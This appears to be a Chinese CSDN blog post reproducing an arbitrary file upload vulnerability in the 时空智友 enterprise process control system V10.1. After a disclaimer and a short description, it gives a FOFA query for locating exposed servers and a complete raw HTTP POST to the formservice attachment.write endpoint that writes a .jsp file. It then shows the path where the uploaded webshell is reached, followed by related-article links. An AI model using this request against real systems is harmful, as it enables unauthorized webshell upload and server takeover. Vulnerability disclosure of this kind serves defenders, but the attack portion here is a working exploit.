时空智友企业流程化管控系统文件存在任意文件上传漏洞

最新推荐文章于 2024-07-10 08:25:12 发布
最新推荐文章于 2024-07-10 08:25:12 发布
阅读量292 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全 网络安全 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44304678/article/details/134203962
版权

时空智友企业流程化管控系统文件存在任意文件上传漏洞

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

时空智友企业流程化管控系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化,从而提高工作效率、降低成本并提升管理水平。时空智友企业流程化管控系统存在任意文件上传漏洞

漏洞影响

时空智友 V10.1

漏洞危害

未经允许的攻击者可通过上传webshell,接管该服务器

网络测绘

Fofa: app=“时空智友V10.1”

在这里插入图片描述
在这里插入图片描述

漏洞复现

1. 构造poc

POST /formservice?service=attachment.write&isattach=false&filename=a.jsp HTTP/1.1
Host: ip:port
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 10

testtest

2. 发送数据包,上传文件

在这里插入图片描述

3. 访问webshell

webshell地址

http://ip:port/form/temp/202311033wokcf0o8mwxph7y_a.jsp

在这里插入图片描述

小胡yhu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
空智企业流程化管控系统文件上传漏洞复现
0xSec
08-22 2778
空智企业流程化管控系统 formservice接口处存在任意文件上传漏洞,未经认证的攻击者可通过此接口上传后门文件,最终可导致服务器失陷。
空智企业流程化管控系统文件存在任意文件上传漏洞 附POC
nnn2188185的博客
09-21 210
空智企业流程化管控系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化,从而提高工作效率、降低成本并提升管理水平。空智企业流程化管控系统存在任意文件上传漏洞
空智采购流程涉及表
qq_37822557的博客
07-15 2093
漏洞复现」空智ERP系统updater.uploadStudioFile 任意文件上传漏洞
qq_39894062的博客
06-30 723
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
空智企业流程化管控系统文件上传漏洞
holyxp的博客
08-23 697
空智企业流程化管控系统是一个功能丰富、灵活可定制的企业管理工具。通过该系统,企业能够实现流程的自动化、协同的提升、数据的洞察和决策的优化,从而提高工作效率、管理水平和企业竞争力。空智企业流程化管控系统 formservice接口处存在任意文件上传漏洞,未经认证的攻击者可通过此接口上传后门文件,最终可导致服务器失陷。
空智企业流程化管控系统任意文件上传漏洞复现【附POC】
薛定谔嘚喵博客
09-25 314
空智企业流程化管控系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化,从而提高工作效率、降低成本并提升管理水平。空智企业流程化管控系统存在任意文件上传漏洞
技巧集锦012:打印设计
NO66781的专栏
10-15 1411
1.打开空智V11.exe,这个是把IE壳+打印组件封装在一起的,原来的ZyPrint.exe有问题是,使用这个; 2.打开【基础设置管理】下的【打印设计】 3.检索要设计打印方案的业务单据 4.选择实例化(各实例化的打印方案可以不同) 5.新增,后填写 6.点【打印设计】,弹出采购开票单,把窗体的左边框向左拖开一些,否则点【打印设计】点不动 7. 点击【设...
市餐厨垃圾信息化管控平台招标文件
06-17
市餐厨垃圾信息化管控平台招标文件
企业内部控制计划流程手册文件
07-04
企业内部控制计划流程手册文件是企业运营中至关重要的指导性文档,旨在确保企业的各项业务活动得以规范、高效且安全地执行。以下将详细阐述手册中涉及的主要知识点: 1. **资金管理**:这部分主要包括资金支付业务...
煤矿企业经营管控数字化系统设计与实现
07-01
深入煤矿企业调研经营管理模式,分析了煤矿企业双重维度的经营管理组织体系和煤矿、经营管理组、部门III级经营管理指标体系,提出了经营管控数字化系统模型,进而研究了系统流程、功能结构及软件技术。最后,采用Web ...
企业集团组织级风险信息化管控系统的角色设计与应用
06-23
近年来,大型企业集团越来越注重生产经营活动中风险的有效管控,建立组织级的风险信息化管控系统已成为推动、落实风险管控各项措施,提升企业管理水平的重要手段。阐释了组织级风险信息化管控系统的基于角色的访问控制...
基于Web的智能变电站SCD文件管控系统
01-12
针对现有智能变电站SCD文件管控系统在文件上传、下载、存储、共享存在的耗长、故障高等问题,该文利用Web服务器设计了一种管控系统。该系统主要包括嵌入式Web文件管理模块、可视化交互模块、SCD文件同步处理模块...
FOFA常用搜索语法
u010508029的博客
05-18 1万+
CVE-2019-17558Apache Solr Velocity模板远程代执行 app="Apache-Shiro"
FOFA(一): FOFA入门
热门推荐
浅弋、璃鱼的博客
01-03 1万+
FOFA是部署在互联网上的网络设备资产信息搜索引擎。旨在尽可能多的对全球IT设备资产进行信息收集, 进而开展资产影响分析、漏洞影响分析, 为相关流行态势感知分析提供依据;
空智企业流程化管控系统formserviceSQL注入漏洞(含批量验证poc)
weixin_43567873的博客
04-17 123
空智企业流程化管控系统formserviceSQL注入漏洞(含批量验证poc)
0day 未公开 泛微E-Cology 存在信息泄露漏洞
weixin_43167326的博客
07-09 804
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。。
空智企业流程化管控系统 formservice SQL注入漏洞(含批量验证poc)
weixin_43567873的博客
04-28 83
空智企业流程化管控系统 formservice SQL注入漏洞(含批量验证poc)
漏洞复现】空智ERP——uploadStudioFile——任意文件上传
最新发布
LongL_GuYu的博客
07-10 573
空智ERP是专为医药等行业设计的综合性企业资源规划系统,融合云计算和移动技术,支持多组织管理。。其uploadStudioFile接口存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件到服务器上,包括木马后门文件,导从而获取服务器权限。
金蝶 apusic 应用服务器存在一个任意文件上传漏洞
12-21
金蝶apusic应用服务器存在一个任意文件上传漏洞,这意味着攻击者可以利用该漏洞向服务器上传恶意文件,从而可能导致服务器遭受各种安全攻击。攻击者可以利用这样的漏洞来上传包含恶意代的文件,然后通过执行这些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值